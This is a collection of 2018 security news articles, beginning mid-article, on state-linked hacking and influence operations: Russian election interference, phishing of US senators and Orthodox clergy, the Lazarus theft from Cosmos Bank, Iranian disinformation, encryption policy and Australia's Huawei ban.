While some law enforcement agencies contend that encryption is being used to shield criminal activity, tech firms and privacy activists argue that any weakening of encryption would harm security for all users.

"The risk is that these countries will compel providers to build a backdoor that not only governments will exploit but hackers, criminals and other bad guys will use as well," said Greg Nojeim of the Washington-based Center for Democracy & Technology.

"It would weaken cybersecurity at the same time governments are preaching that cybersecurity needs to be addressed."

Marc Rotenberg, president of the Electronic Privacy Information Center, called the latest effort "a short-sighted and counterproductive proposal" and added that "it has become clear that encryption is vital for both privacy and public safety."

Similar concerns were voiced by Amnesty International, which said in a tweet, "This won't make us safer -- it will just weaken security for everyone."

Debate on 'going dark'

Encryption has been a hot-button issue in the United States for years, and came to a head in 2016 when Apple challenged the FBI's request to create software that would enable investigators to access an iPhone used by an attacker in a 2015 mass shooting in San Bernardino, California.

The US government eventually dropped its demand after finding another means to access the device, but a number of law enforcement officials have complained that they are "going dark" with the use of encrypted apps and devices that cannot be accessed by traditional wiretaps.

Nojeim said the claim of "going dark" is vastly exaggerated.

"There has never been more electronic information available to assist criminal and intelligence investigations," he said.

"We leave a digital footprint with virtually everything we do online and most of those footprints can be collected without the hindrance of encryption."

But James Lewis of the Center for Strategic and International Studies, who supports better law enforcement access, said tech firms may face more pressure than in the past.

"It's part of the bigger public move to rein in the tech companies and make them more socially responsible," Lewis said. "The old laissez-faire arguments are losing ground."


Will Russian Hackers Affect This Year's US Election?
4.9.18 securityweek  BigBrothers

Nearly a year after Russian government hackers meddled in the 2016 U.S. election, researchers at cybersecurity firm Trend Micro zeroed in on a new sign of trouble: a group of suspect websites.

The sites mimicked a portal used by U.S. senators and their staffs, with easy-to-miss discrepancies. Emails to Senate users urged them to reset their passwords — an apparent attempt to steal them.

Once again, hackers on the outside of the American political system were probing for a way in.

"Their attack methods continue to take advantage of human nature and when you get into an election cycle the targets are very public," said Mark Nunnikhoven, vice president of cloud research at Trend Micro.

Now the U.S. has entered a new election cycle. And the attempt to infiltrate the Senate network, linked to hackers aligned with Russia and brought to public attention in July, is a reminder of the risks, and the difficulty of assessing them.

Newly reported attempts at infiltration and social media manipulation — which Moscow officially denies — point to Russia's continued interest in meddling in U.S. politics. There is no clear evidence, experts said, of efforts by the Kremlin specifically designed to disrupt elections in November. But it wouldn't take much to cause turmoil.

"It's not a question of whether somebody is going to try to breach the system, to manipulate the system, to influence the system," said Robby Mook, who managed Hillary Clinton's presidential campaign and co-directs a Harvard University project to protect democracy from cyberattacks, in an interview earlier this year. "The question is: Are we prepared for it?"

Online targeting of the U.S. political system has come on three fronts — efforts to get inside political campaigns and institutions and expose damaging information; probes of electoral systems, potentially to alter voter data and results; and fake ads and accounts on social media used to spread disinformation and fan divisions among Americans.

In recent weeks, Microsoft reported that it had disabled six Russian-launched websites masquerading as U.S. think tanks and Senate sites. Facebook and the security firm FireEye revealed influence campaigns, originating in Iran and Russia, that led the social network to remove 652 impostor accounts, some targeted at Americans. The office of Republican Sen. Pat Toomey of Pennsylvania said hackers tied to a "nation-state" had sent phishing emails to old campaign email accounts.

U.S. officials said they have not detected any attempts to corrupt election systems or leak information rivaling Kremlin hacking before President Donald Trump's surprise 2016 victory.

Still, "we fully realize that we are just one click away of the keyboard from a similar situation repeating itself," Dan Coats, the director of national intelligence, said in July.

Michael McFaul, the architect of the Obama administration's Russia policy, has said he believes Russian President Vladimir Putin perceives little benefit in a major disruption effort this year, preferring to keep his powder dry for the 2020 presidential contest.

But even if the upcoming elections escape disruption, that hardly means the U.S. is in the clear.

Trump's decision in May to eliminate the post of White House cybersecurity coordinator confirmed his lack of interest in countering Russian meddling, critics say. Congress has not delivered any legislation to combat election interference or disinformation. Last week, a review of the bipartisan "Secure Elections Act" was canceled after Republican leaders registered objections, congressional staffers said.

The risks extend beyond the midterms.

"The biggest question is going to be how are you going to make sure that people actually trust the results, because democracy relies on credibility," said Ben Nimmo, a researcher at the Atlantic Council. "It's not over after November."

Experts said it is too late to safeguard U.S. voting systems and campaigns this election cycle. But with two months to go, there is time enough to take stock of the Russian-sponsored interference that has come to light so far — and to assess the risks of what we don't know.

In mid-2016, hackers found a way into the voter registration database at the Illinois State Board of Elections and spent three weeks poking around. After the breach was discovered, officials said the infiltrators had downloaded the records of up to 90,000 voters.

It's not clear that anything nefarious was done with those records. But when special counsel Robert Mueller charged a dozen Russian intelligence agents with hacking this July, the indictment clarified the potential for damage. The hackers had, in fact, stolen information on 500,000 voters, including dates of birth and partial Social Security numbers.

"The internet allows foreign adversaries to attack Americans in new and unexpected ways," Deputy Attorney General Rod Rosenstein said, in announcing the indictments.

The Illinois hack is the most notable case of foreign tampering with U.S. election systems to come to light. There has been no evidence of efforts to change voter information or tamper with voting machines, though experts caution hackers might have planted unseen malware in far-flung election systems that could be triggered later.

Potential problems are not limited to Illinois.

A week before the 2016 general election, Russian intelligence agents sent spear-phishing emails to 122 local elections officials who were customers of VR Systems, a Tallahassee, Florida-based election software vendor.

In addition to Illinois, at least 20 other state systems were probed by the same Russian military unit that targeted VR's customers, federal officials said.

"My unofficial opinion is that we're kind of fooling ourselves if we don't think that they tried to at least make a pass at all 50 states," said Christopher Krebs, the undersecretary for critical infrastructure at DHS.

In June 2017, the federal Election Assistance Commission informed dozens of local voting officials that hackers had attempted to penetrate the systems of a voting system manufacturer, presumed by many to be VR.

"Attempts have been made to obtain voting equipment, security information and in general to probe for vulnerabilities," the EAC wrote officials. Despite those concerns, federal officials have moved slowly to share intelligence with officials who supervise elections. As of mid-August, 92 state officials had been given clearances.

Much of the machinery used to collect and tabulate votes is antiquated, built by a handful of unregulated and secretive vendors, with outdated software that makes them highly vulnerable to attacks, researchers said.

"If someone was able to compromise even a handful of voting machines I think that would be sufficient to cause people to not trust the system," said Sherri Ramsay, a former National Security Agency senior executive.

This spring, a website used by Knox County, Tennessee, officials to display election-night results was knocked offline by an unidentified perpetrator. While the attack was little noticed, it would not be hard to replicate, experts said. Combined with a social media campaign alleging vote tampering, such mischief could cast a shadow over an election, they said.

Election officials have been sandboxing such scenarios for weeks as they prepare for November's balloting.

There's already a Russian playbook for thwarting an election: In Ukraine in 2014, the presidential contest was disrupted by a virus that scrambled election-management software, followed by a media disinformation campaign claiming a pro-Moscow candidate had won.

Democratic Sen. Claire McCaskill of Missouri is plenty busy this fall as she seeks re-election in a state that voted overwhelmingly for Trump. So when an attempt by Russian hackers to infiltrate her campaign came to light in July, she acknowledged it only briefly.

"While this attack was not successful, it is outrageous that they think they can get away with this," McCaskill said. "I will not be intimidated. I've said it before and I will say it again, Putin is a thug and a bully."

The failed hack, which included an attempt to steal the password of at least one McCaskill staffer through a fake Senate login website identified by Microsoft, is the most notable instance of attempted campaign meddling by Russia made public this year.

Microsoft executives said recently that the company had detected attempts by Russia's GRU military intelligence agency to hack two senators. One was presumably McCaskill, but the others have not been identified.

The group behind that attempt, Fancy Bear, is the same one indicted July 13 and identified by Microsoft as the creator of fake websites targeting the Hudson Institute and the International Republican Institute, frequent critics of the Kremlin. Since the summer of 2017, Fancy Bear has aggressively targeted political groups, universities, law enforcement agencies and anti-corruption nonprofits in the U.S. and elsewhere, according to TrendMicro.

"Russian hackers appear to be broadening their target set, but I think tying it to the midterm elections is pure speculation at this point," said Michael Connell , an analyst at the federally funded Center for Naval Analyses in Arlington, Virginia.

There have been other recent reports of U.S. congressional campaign websites targeted by hackers, but that doesn't mean Russian agents are to blame. Experts said most are likely run-of-the-mill criminal cyberattacks seeking financial gain rather than political change.

But Eric Rosenbach, who served as assistant secretary of defense for global security during President Barack Obama's administration and is now at Harvard, said the limited examples of Russian intrusion that have come to light may be only a tip to more significant, still hidden schemes.

"There probably have already been compromises of important campaigns in places where it could sway the outcome or undermine trust in the election," Rosenbach said. "We might not see that until the very last moment."

The risk is magnified by poor efforts to protect many campaign sites, said Josh Franklin, until last month the lead National Institutes of Standards and Technology researcher on voting systems security.

Nearly a third of the 527 House of Representatives campaigns examined by Franklin and fellow researchers had such poor cybersecurity they were graded worse than failing.

"We couldn't go any further with our scan," he said. "We were told that we would be in danger of being sued by the candidate campaigns."

By the time a group called "ReSisters" began organizing a rally against white nationalism for Aug. 10, it had spent more than a year sharing left-wing posts about feminism, immigration and other hot-button topics.

"Confront + Resist Fascism," the group urged on a Facebook event page for its "No Unite the Right 2" protest in Washington, D.C. Like-minded Facebook users posted information about transportation, materials and location so those interested could attend.

In late July, Facebook short-circuited the effort, shutting down the pages and accounts of ReSisters and 31 others. Despite appearing to speak for Americans, the company said, the accounts were planted by unidentified outsiders to fuel divisions among U.S. voters. Researchers at the Atlantic Council who examined the accounts said they acted in ways echoing Russian troll operations before the 2016 election, pointing to English on the pages speckled with grammatical mistakes typical of native Russian speakers.

"We face determined, well-funded adversaries who will never give up and are constantly changing tactics," Facebook said. The outing of the sites is a reminder as November approaches that Russians and other foreign actors continue to use social media to try to influence U.S. politics.

Since the 2016 election, officials and researchers have learned much more about such infiltration. The May release by House Democrats of more than 3,500 ads placed on Facebook by Russian agents from 2015 to 2017 revealed a deliberate campaign to inflame racial divisions in the U.S. Facebook and other tech companies say they are working hard to combat such behavior. But it is not nearly enough, experts said.

The companies must be forced to act faster against Russian and other disinformation campaigns and be made more accountable , said Dipayan Ghosh, a fellow at Harvard's Kennedy School of Government who has worked at both the White House and Facebook on tech policy including social media manipulation.

Ghosh said quantifying Russian disinformation on social media is difficult because they "are operating behind a commercial veil" of for-profit networks that are not subject to public scrutiny.

"The industry is currently accountable to nobody," Ghosh said.

After Facebook was criticized for allowing a data-mining firm to collect information about millions of its users, CEO Mark Zuckerberg said he was open to regulation. But the "Honest Ads Act," which would require online political ads to be identified as they are in traditional media, has stalled in Congress.

The bill's sponsors include the late John McCain and Sen. Mark Warner, the Virginia Democrat who has pressed Facebook for change since the 2016 elections. Executives from Facebook, Twitter and Google are expected to testify before Warner and other members of the Senate Intelligence Committee this week.

Experts said they are uncertain of the effectiveness of Russian disinformation, complicating assessment of the threat it might now pose.

In 2016, Russian actors likely did the greatest damage by hacking and leaking emails from Hillary Clinton's campaign and Democrats' national organization, which were widely reported by the news media. But comparatively few American voters saw individual pieces of misinformation on social media, making it unlikely that it swayed votes , said Brendan Nyhan, a University of Michigan political scientist who has analyzed the scope and impact of the Russian operations.

"There's still too much simplistic thinking about all-powerful propaganda that doesn't correspond to what we know from social science about how hard it is to change people's minds. I'm more concerned about the threat of intensifying polarization and calling the legitimacy of elections into question than I am about massive swings in vote choice," he said.

Still, it is clear that Russian intelligence views its efforts as successful and their example has already stirred others, like Iran, to try similar strategies. Such efforts are bent on coloring U.S. politics even if they are not tied to a specific election, said Lee Foster, FireEye's manager of information operations analysis.

"Where do you draw the line between efforts to influence the election or an election or efforts to influence U.S. domestic politics in general?" Foster said. "We can't just think in the context of the next election. It's not like this goes away after the midterms."


Lithuanian Media Sign Pact With Govt to Counter Hackers
30.8.18 securityweek BigBrothers

Lithuania's major online media outlets on Tuesday signed an agreement to work with the defence ministry as they try to fend off a growing barrage of cyber attacks, largely blamed on Russia.

Fears are increasing over possible meddling in elections next year in the Baltic EU and NATO state, where hackers have planted fake news stories on media organizations' websites, or crashed them altogether.

Warning that cyberattacks can sow "great chaos in society and in the state", Defence Minister Raimundas Karoblis said Tuesday that the state felt compelled to cooperate with the media to combat the attacks.

Under the agreement media groups will share information and strategies with government, while press representatives will be able to attend meetings of the National Cyber Security Council.

Lithuania's defence ministry has said attacks are becoming "more and more coordinated, complex and refined", while intelligence services say most of the hostile cyber activity can be traced back to Russia.

The national intelligence agency warned in March that "Russian hackers will likely use cyber tools to influence the upcoming elections in Lithuania in 2019", referring to upcoming presidential, local and European ballots.

Lithuanian online media outlets have crashed on numerous occasions in recent years after being subject to so-called distributed denial of service, or DDoS, attacks.

Last year hackers posted a fake news story on the site of the Baltic News Service (BNS) newswire alleging that a group of US troops in Latvia had been exposed to mustard gas.

Hackers also planted a fake news story about Karoblis coming out as being gay on the Tv3.lt news website earlier this year.

Moscow has long objected to Lithuania's drive to join western institutions after it became the first republic to break free from the crumbling Soviet Union in 1990.


Telegram Says to Cooperate in Terror Probes, Except in Russia
29.8.18 securityweek
Social  BigBrothers

The Telegram encrypted messenger app said Tuesday said it would cooperate with investigators in terror probes when ordered by courts, except in Russia where it is locked in an ongoing battle with authorities.

The company founded by Russian Pavel Durov has refused to provide authorities in the country with a way to read its communications and was banned by a Moscow court in April as a result.

But in its updated privacy settings, Telegram said it would disclose its users' data to "the relevant authorities" elsewhere if it receives a court order to do so, although not in Russia.

"If Telegram receives a court order that confirms you're a terror suspect, we may disclose your IP address and phone number to the relevant authorities," Telegram's new privacy settings said.

"So far, this has never happened. When it does, we will include it in a semiannual transparency report," the app added.

Durov said the new privacy terms were adopted to "comply with new European laws on protecting private data."

But Durov assured his Russian users that Telegram would continue to withhold their data from security services.

"In Russia, Telegram is asked to disclose not the phone numbers or IP addresses of terrorists based on a court decision, but access to the messages of all users," he wrote on his Telegram channel.

He added that since Telegram is illegal in Russia, "we do not consider the request of Russian secret services and our confidentiality policy does not affect the situation in Russia."

Durov has long said he would reject any attempt by the country's security services to gain backdoor access to the app.

Telegram lets people exchange messages, stickers, photos and videos in groups of up to 5,000 people. It has attracted more than 200 million users since its launch by Durov and his brother Nikolai in 2013.

Russia has acted to curb internet freedoms as social media has become the main way to organise demonstrations.

Authorities stepped up the heat on popular websites after Vladimir Putin started his fourth Kremlin term in 2012, ostensibly to fight terrorism but analysts say the real motive was to muzzle Kremlin critics.

According to the independent rights group Agora, 43 people were given prison terms for internet posts in Russia in 2017.

Tech companies have had difficulty balancing the privacy of users against law enforcement, with encryption of communications adding a layer of complexity to cooperating with authorities.

One of Telegram's rival apps, Facebook-owned Whatsapp, says it complies with authorities in accordance with "applicable law".


Google Tells Toomey Hackers Tried to Infiltrate Staff Email
28.8.18 securityweek Hacking  BigBrothers

Google has alerted U.S. Sen. Pat Toomey's office that hackers with ties to a "nation-state" sent phishing emails to old campaign email accounts, a spokesman for the Pennsylvania Republican said Friday.

Toomey's office was notified this week about the attempt to infiltrate email accounts, said spokesman Steve Kelly. He said the dormant accounts hadn't been used since the end of the 2016 campaign, and the staffers they're attached to no longer work for Toomey. The nation-state wasn't identified.

"This underscores the cybersecurity threats our government, campaigns, and elections are currently facing," he said. "It is essential that Congress impose tough penalties on any entity that undermines our institutions."

Toomey currently isn't running for office and the effort would not have affected the upcoming midterm elections.

Google told Toomey's office that the emails appeared to be exploratory, Kelly said. Based on scans for spam, phishing and malware, the emails likely did not contain malware or links to a credential-phishing site, he said.

A Google spokesman said the company wasn't commenting on the phishing attempt.

The notification is the latest by a tech company of suspected Kremlin attempts to spy on U.S. elected officials and campaigns and potentially meddle in U.S. politics.

Google's warning to Toomey comes just weeks after a Microsoft discovery led Sen. Claire McCaskill, a Missouri Democrat who is running for re-election, to reveal that state-backed Russian hackers tried unsuccessfully to infiltrate her Senate computer network last fall.

That effort recalled what U.S. prosecutors called in a July 13 indictment a concerted effort by Russian military operatives ahead of the 2016 election focused on helping to elect Republican Donald Trump to the presidency by exposing internal divisions in the Democratic Party meant to discredit his opponent, Hillary Clinton. The indictment says the Russian agents broke into Democratic national organization servers and stole and leaked damaging emails.

On Tuesday, Microsoft disclosed what it called new Russian espionage efforts targeting U.S. political groups — this time conservative Republican foes that have promoted sanctions to punish the Kremlin for military aggression against Ukraine.

The company said a group tied to the Russian government created fake websites — presumably to steal passwords or plant spyware— that appeared to spoof two American conservative organizations: the Hudson Institute and the International Republican Institute. Three other fake sites were designed to look as if they belonged to the U.S. Senate.

The Kremlin denied involvement.


North Korea-linked Hackers Stole $13.5 Million From Cosmos Bank: Report
28.8.18 securityweek APT  BigBrothers

The North Korea-linked hacking group Lazarus is said to have stolen $13.5 million in a recent cyber-attack targeting SWIFT/ATM infrastructure of Cosmos Bank.

The attackers likely gained access to the bank’s systems via spear phishing and/or remote administration/third-party interface and used multiple attack techniques to steal funds. The theft took place between August 10 and 13, 18, according to researchers from Securonix.

Believed to be backed by the North Korean government, the Lazarus group was said last year to be the most serious threat to banks. This year, the hackers also focused heavily on crypto-currency exchanges and have been involved in numerous attacks against such organizations.

A recent report also revealed that most malware families originating from North Korea can be linked to Lazarus via code reuse.

Now, Securonix security researchers reveal that Lazarus was behind a high-profile ATM/SWIFT banking attack involving the Cosmos Bank, a 112-year old cooperative bank in India and the second largest in the country.

As part of the incident, the hackers are believed to have leveraged a previously established foothold before compromising the bank’s internal and ATM infrastructure on August 10-11.

Likely abusing vendor ATM test software or modifying the currently deployed ATM payment switch software, they set up a malicious ATM/POS switch and hijacked the connection between the central switch and the backend/Core Banking System (CBS).

Next, they made adjustments to the target account balances to enable withdrawals and leveraged the malicious switch to authorize ATM withdrawals for over $11.5 million in tens of thousands of domestic and international transactions, using 450 cloned (non-EMV) debit cards in 28 countries.

The malicious switch was used to send fake messages to authorize the transactions and also to prevent details sent from payment switch to reach the CBS (thus, checks on card number, card status PIN, and more were never performed).

On August 13, 18, likely following lateral movement, the threat actor abused the Cosmos Bank’s SWIFT SAA environment LSO/RSO compromise/authentication to send three international wire transfer requests to ALM Trading Limited at Hang Seng Bank in Hong Kong, amounting to around $2 million.

“The ATM/POS banking switch that was compromised in the Cosmos Bank attack is a component that typically provides hosted ATM/POS terminal support, an interface to core banking solution (CBS) or another core financial system, and connectivity to regional, national or international networks. The primary purpose of the system is to perform transaction processing and routing decisions,” Securonix explains.

By focusing on the bank’s infrastructure instead of basic card-not-present (CNP), jackpotting or blackboxing fraud, the well-planned, highly coordinated attack was able to effectively bypass bank’s layers of defense against ATM attacks.

The security firm attributes the attack to Lazarus, a group known for the use of Windows Admin Shares for Lateral Movement, the use of custom command and control (C&C) servers that mimic TLS, the use of Windows services for persistence, timestomping, and reflective DLL injection, along with other attack techniques.


Sacrilegious Spies: Russians Tried Hacking Orthodox Clergy
28.8.18 securityweek BigBrothers

Russian Hackers Who Bedeviled 2016 U.S. Election Also Spied on Senior Orthodox Christian Figures

LONDON (AP) — The Russian hackers indicted by the U.S. special prosecutor last month have spent years trying to steal the private correspondence of some of the world's most senior Orthodox Christian figures, The Associated Press has found, illustrating the high stakes as Kiev and Moscow wrestle over the religious future of Ukraine.

The targets included top aides to Ecumenical Patriarch Bartholomew I, who often is described as the first among equals of the world's Eastern Orthodox Christian leaders.

The Istanbul-based patriarch is currently mulling whether to accept a Ukrainian bid to tear that country's church from its association with Russia, a potential split fueled by the armed conflict between Ukrainian military forces and Russia-backed separatists in eastern Ukraine.

The AP's evidence comes from a hit list of 4,700 email addresses supplied last year by Secureworks, a subsidiary of Dell Technologies.

The AP has been mining the data for months, uncovering how a group of Russian hackers widely known as Fancy Bear tried to break into the emails of U.S. Democrats , defense contractors , intelligence workers , international journalists and even American military wives . In July, as part of special counsel Robert Mueller's ongoing investigation into Russian interference in the 2016 U.S. election, a U.S. grand jury identified 12 Russian intelligence agents as being behind the group's hack-and-leak assault against Hillary Clinton's presidential campaign.

The targeting of high-profile religious figures demonstrates the wide net cast by the cyberspies.

Patriarch Bartholomew claims the exclusive right to grant a "Tomos of Autocephaly," or full ecclesiastic independence, sought by the Ukrainians. It would be a momentous step, splitting the world's largest Eastern Orthodox denomination and severely eroding the power and prestige of the Moscow Patriarchate, which has positioned itself as a leading player within the global Orthodox community.

Ukraine is lobbying hard for a religious divorce from Russia and some observers say the issue could be decided as soon as next month.

"If something like this will take place on their doorstep, it would be a huge blow to the claims of Moscow's transnational role," said Vasilios Makrides, a specialist in Orthodox Christianity at the University of Erfurt in Germany. "It's something I don't think they will accept."

The Kremlin is scrambling to help Moscow's Patriarch Kirill retain his traditional role as the head of the Ukrainian Orthodox Church and "the more they know, the better it is for them," Makrides said.

The Russian Orthodox Church said it had no information about the hacking and declined comment. Russian officials referred the AP to previous denials by the Kremlin that it has anything to do with Fancy Bear, despite a growing body of evidence to the contrary.

Ukrainian President Petro Poroshenko flew to Istanbul in April in an effort to convince the patriarch to agree to a split, which he has described as "a matter of our independence and our national security." Moscow's Patriarch Kirill is flying to Turkey later this week in a last-ditch bid to prevent it.

Hilarion Alfeyev, Kirill's representative abroad, has warned that granting the Tomos could lead to the biggest Christian schism since 1054, when Catholic and Orthodox believers parted ways.

"If such a thing happens, Orthodox unity will be buried," Alfeyev said.

The issue is an extraordinarily sensitive one for the Ecumenical Patriarchate. Reached by phone, spokesman Nikos-Giorgos Papachristou said: "I don't want to be a part of this story."

Other church officials spoke to the AP about the hacking on condition of anonymity, saying they did not have authorization to speak to the media.

Bartholomew, who is 78, does not use email, those church officials told AP. But his aides do, and the Secureworks list spells out several attempts to crack their Gmail accounts.

Among them were several senior church officials called metropolitans, who are roughly equivalent to archbishops in the Catholic tradition. Those include Bartholomew Samaras, a key confidante of the patriarch; Emmanuel Adamakis, an influential hierarch in the church; and Elpidophoros Lambriniadis, who heads a prestigious seminary on the Turkish island of Halki. All are involved in the Tomos issue; none returned recent AP messages seeking comment.

Spy games have long been a part of the Russian Orthodox world.

The Soviet Union slaughtered tens of thousands of priests in the 1930s, but the Communists later took what survived of the church and brought it under the sway of Russia's secret police, the KGB, with clerics conscripted to spy on congregants and emigres.

The nexus between Russia's intelligence and religious establishments survived the 1991 fall of the Soviet Union and the KGB's reorganization into the FSB, according to Moscow-based political analyst Dmitry Oreshkin.

"Our church leaders are connected to the FSB and their epaulettes stick out from under their habits," Oreshkin said. "They provide Vladimir Putin's policy with an ideological foundation."

That might make one target found by the AP seem curious: The Moscow Patriarch's press secretary, Alexander Volkov.

But Orthodox theologian Cyril Hovorun said he wouldn't be surprised to see a Russian group spying on targets close to home, saying, "they're probably checking him out just in case."

Volkov did not return AP emails seeking comment.

Hovorun is unusually qualified to speak on the issue. In 2012 he — like Volkov — was an official within the Moscow Patriarchate. But he resigned after someone leaked emails showing that he secretly supported independence-leaning Ukrainian clergy.

Hovorun has since been targeted by the Russian hackers, according to the data from Secureworks, which uses the name Iron Twilight to refer to the group.

Hovorun said he believes that those who published his emails six years ago weren't related to Fancy Bear, but he noted that their modus operandi — stealing messages and then publishing them selectively — was the same.

"We've known about this tactic before the hacking of the Democrats," Hovorun said, referring to the email disclosures that rocked America's 2016 presidential campaign. "This is a familiar story for us."

The Russian hackers' religious dragnet also extended to the United States and went beyond Orthodox Christians, taking in Muslims, Jews and Catholics whose activities might conceivably be of interest to the Russian government.

John Jillions, the chancellor of the Orthodox Church in America, provided the AP with a June 19, 2015, phishing email that Secureworks later confirmed was sent to him by Fancy Bear.

Fancy Bear also went after Ummah, an umbrella group for Ukrainian Muslims; the papal nuncio in Kiev; and an account associated with the Ukrainian Greek-Catholic Church, a Byzantine rite church that accepts the authority of the Vatican, the Secureworks data shows.

Also on the hit list: Yosyp Zisels, who directs Ukraine's Association of Jewish Organizations and Communities and has frequently been quoted defending his country from charges of anti-Semitism. Zisels said he had no knowledge of the attempted hacking. Vatican officials did not return messages.

Protestants were targeted too, including three prominent Quakers operating in the Moscow area.

Hovorun said Protestants were viewed with particularly intense suspicion by the Kremlin.

"There is an opinion shared by many in the Russian establishment that all those religious groups — like Quakers, evangelicals — they are connected to the American establishment," he said.

Secureworks' data shows hacking attempts on religious targets that took place in 2015 and 2016, but other material obtained by the AP suggests attempts to compromise the Ecumenical Patriarchate are ongoing.

On Oct. 16, 2017, an email purporting to come from Papachristou, who was just being appointed as spokesman, arrived in the inboxes of about a dozen Orthodox figures.

"Dear Hierarchs, Fathers, Brothers and Sisters in Christ!" it began, explaining that Papachristou was stepping into his new role as director of communications. "It's a very big joy for me to serve the Church on this position. Some suggestions on how to build up relations with the public and the press are provided in the file attached."

The file was rigged to install surveillance software on the recipients' computers.

The email's actual sender remains a mystery — independent analyses of the malicious message by Secureworks and its competitor CrowdStrike yielded nothing definitive.

Church officials told the AP they were disturbed by the hacker's command of church jargon and their inside knowledge of Papachristou's appointment.

"The one who made this is someone who knows us," one official said.

Priests and prelates don't make obvious targets for cyberespionage, but the stakes for the Kremlin are high as the decision on Tomos looms.

Granting the Ukrainian church full independence "would be that devastating to Russia," said Daniel Payne, a researcher on the board of the J.M. Dawson Institute of Church-State Studies at Baylor University in Texas.

"Kiev is Jerusalem for the Russian Orthodox people," Payne said. "That's where the sacred relics, monasteries, churches are ... it's sacred to the people, and to Russian identity."


Australia banned Huawei from 5G network due to security concerns
25.8.18 securityaffairs BigBrothers

Chinese-owned telecommunications firm Huawei has been banned from Australia’s 5G network due to security concerns.
The Australian government considers risky the involvement of Huawei for the rolling out of next-generation 5G communication networks.

Huawei Australia defined the decision disappointing.

Huawei Australia

@HuaweiOZ
We have been informed by the Govt that Huawei & ZTE have been banned from providing 5G technology to Australia. This is a extremely disappointing result for consumers. Huawei is a world leader in 5G. Has safely & securely delivered wireless technology in Aust for close to 15 yrs

1:36 AM - Aug 23, 18
588
899 people are talking about this
Twitter Ads info and privacy
The Chinese company has been founded by a former People’s Liberation Army official in 1987.

The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with the Chinese intelligence, but it is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei Australia Chairman John Lord explained in June that banning one of the world’s leading 5G suppliers could impact Australia’s economic growth and productivity for generations.

The Chinese Government is concerned about the decision of the Australian Government.

“We urge the Australian government to discard ideological biases and create a level-playing filed for Chinese companies’ operations in Australia,” said Foreign Ministry spokesman Lu Kang.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to unacceptable security risk they pose.

The Pentagon considers the security risk posed by the adoption of the devices manufactured by the Chinese firms unacceptable, US officials believe the smartphones could be used to spy on military personnel.

“Huawei and ZTE devices may pose an unacceptable risk to the department’s personnel, information and mission,” said Pentagon spokesman Major Dave Eastburn.

“In light of this information, it was not prudent for the department’s exchanges to continue selling them.”

In February, Dan Coats, the Director of National Intelligence, along with several other top intel officials, invited Americans to avoid buying Huawei and ZTE products.


Google Blocks Accounts in 'Influence Operation' Linked to Iran
24.8.18 securityweek BigBrothers

Google said Thursday it blocked YouTube channels and other accounts over a misinformation campaign linked to Iran, on the heels of similar moves by Facebook and Twitter.

Google said that working with the cybersecurity firm FireEye, it linked the accounts to the Islamic Republic of Iran Broadcasting as part of an effort dating to at least January 2017.

"We identified and terminated a number of accounts linked to the IRIB organization that disguised their connection to this effort," Google vice president Kent Walker said in a statement.

"Actors engaged in this type of influence operation violate our policies, and we swiftly remove such content from our services and terminate these actors' accounts."

Google became the latest online service to crack down on misinformation efforts stemming from Russia and Iran, with the apparent aim of sowing discord and confusion ahead of the November US elections.

The tech giant said it blocked 39 YouTube channels that had racked up to total of 13,466 views in the US on "relevant videos" and disabled six accounts at Blogger and 13 accounts at its Google+ social network.

"In addition to the intelligence we received from FireEye, our teams have investigated a broader range of suspicious actors linked to Iran who have engaged in this effort," Google said.

Phishing season

Google also said it has blocked state-sponsored phishing attacks in which deceptive messages were sent to users of its free email service in an effort to trick people into disclosing information such as passwords.

"In recent months, we've detected and blocked attempts by state-sponsored actors in various countries to target political campaigns, journalists, activists, and academics located around the world," Google said.

The California-based internet giant added that in the past year it has intensified defenses against "actors linked to" the Russia-backed Internet Research Agency (IRA).

Google has removed YouTube channels and a Blogger account as a result of watching to IRA activities, according to the company. A FireEye report released on Thursday detailed its findings and expressed confidence in attributing influence campaigns to Iran.

Evidence included phone numbers, website registration information, and promotion of content in synch with Iranian political interests, according to the report.

"The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media driven influence operations as a means of shaping political discourse," FireEye said.

"These operations extend well beyond those conducted by Russia."

Coordinated manipulation

Facebook this week revealed that it removed more than 650 pages, groups and accounts identified as "networks of accounts misleading people about what they were doing."

The accounts, some on Facebook-owned Instagram, were presented as independent news or civil society groups but were actually working in coordinated efforts, the company said.

The social network giant said some of the pages were tied to groups previously linked to Russian intelligence operations.

Separately, Twitter said it suspended 284 accounts "for engaging in coordinated manipulation," adding that "it appears many of these accounts originated from Iran."

Former Facebook security chief Alex Stamos said in a blog post Wednesday that gaping holes remain in online platforms.

Stamos, who left Facebook this month to join Stanford University, said that "the United States has broadcast to the world that it doesn't take these issues seriously...While this failure has left the US unprepared to protect the 18 elections, there is still a chance to defend American democracy in 2020."

Microsoft last week seized websites it linked to Russian intelligence that sought to meddle in US political debate.


Australia Bans Huawei From 5G Network Over Security Concerns
24.8.18 securityweek BigBrothers

CANBERRA, Australia (AP) — Chinese-owned telecommunications giant Huawei has been blocked from rolling out Australia's 5G network due to security concerns.

The government said Thursday that the involvement of a company "likely to be subject to extrajudicial directions from a foreign government" presented too much risk.

Several governments have been scrutinizing Huawei over its links to the Chinese government. The private Chinese company started by a former People's Liberation Army major in 1987 suffered a setback in the U.S. market in 2012 when a congressional report said it was a security risk and warned phone companies not to buy its equipment.

Huawei has said it would never hand over Australian customer data to Chinese spy agencies, but the government's statement said no combination of security controls sufficiently mitigated the risk.

Acting Home Affairs Minister Scott Morrison said the government was committed to protecting 5G networks.

The decision also affects ZTE Corp, a Chinese maker of mobile devices.

Shenzhen-based Huawei, the world's largest telecommunications equipment supplier, had been banned from bidding for contracts for Australia's broadband network in 2011.

5G networks will start commercial services in Australia next year.

Huawei Australia tweeted that the decision was "extremely disappointing." Huawei Australia Chairman John Lord had said in June that rejecting one of the world's leading 5G suppliers could impact Australia's economic growth and productivity for generations.

In Beijing, Foreign Ministry spokesman Lu Kang expressed "serious concerns" about the decision and accused the Australian government of "making up excuses to create hurdles deliberately and taking discriminative measures in this regard.

"We urge the Australian government to discard ideological biases and create a level-playing filed for Chinese companies' operations in Australia," Lu told reporters at a daily briefing.

The U.S. House Intelligence Committee previously found that Huawei and ZTE, which is partly state-owned, were tied to the Chinese government and that both companies failed to provide responsive and detailed answers about those relationships and about their U.S. operations.

